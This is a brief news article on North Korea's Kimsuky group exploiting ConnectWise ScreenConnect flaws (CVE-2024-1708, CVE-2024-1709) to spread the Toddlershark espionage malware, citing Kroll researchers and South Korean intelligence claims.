North Korean hackers utilized recently discovered vulnerabilities in Connectwise Screenconnect to deploy a new malicious software called Toddlershark.
According to a report by Kroll, Toddlershark shares similarities with the infamous Kimsuky malware variants, such as Babyshark and Reconshark.
“Attackers exploited the vulnerabilities in the SCREENCONNECT application settings to gain access to the victims’ workstations,” reported researchers Kit Wojutshek, George Glass, and Dave Truman. “They then utilized this access to execute mshta.exe with the URL of the malicious software written in Visual Basic.”
The vulnerabilities in question are Connectwise CVE-2024-1708 and CVE-2024-1709, which were disclosed at the end of February. Since then, various groups have been actively using them to distribute cryptocurrency miners, ransomware, remote access tools, and information stealers.
The Kimsuky group, also known as APT43, continues to expand its arsenal of malicious tools, with recent additions including Gobear and Troll Stealer. Babyshark, discovered in late 2018, operates through an HTML application, stealing system information upon infiltration and awaiting further instructions from its operator.
In May 2023, a version of Babyshark called Reconshark, distributed through phishing emails, was identified. Toddlershark is believed to be the latest iteration in this line due to code similarities and tactics.
Essentially, Toddlershark is designed to exfiltrate sensitive data from compromised systems, serving as a cyberespionage tool.
Developers caution that Toddlershark “exhibits traits of polymorphic behavior, potentially making detection challenging in certain environments.”
Meanwhile, South Korea’s National Intelligence Service has accused North Korea of infiltrating the servers of two domestic semiconductor manufacturers and stealing valuable data in December 2023 and February 2024. It is speculated that North Korea may be gearing up for domestic semiconductor production in response to procurement challenges posed by sanctions and the increasing demand for semiconductors in weapon development.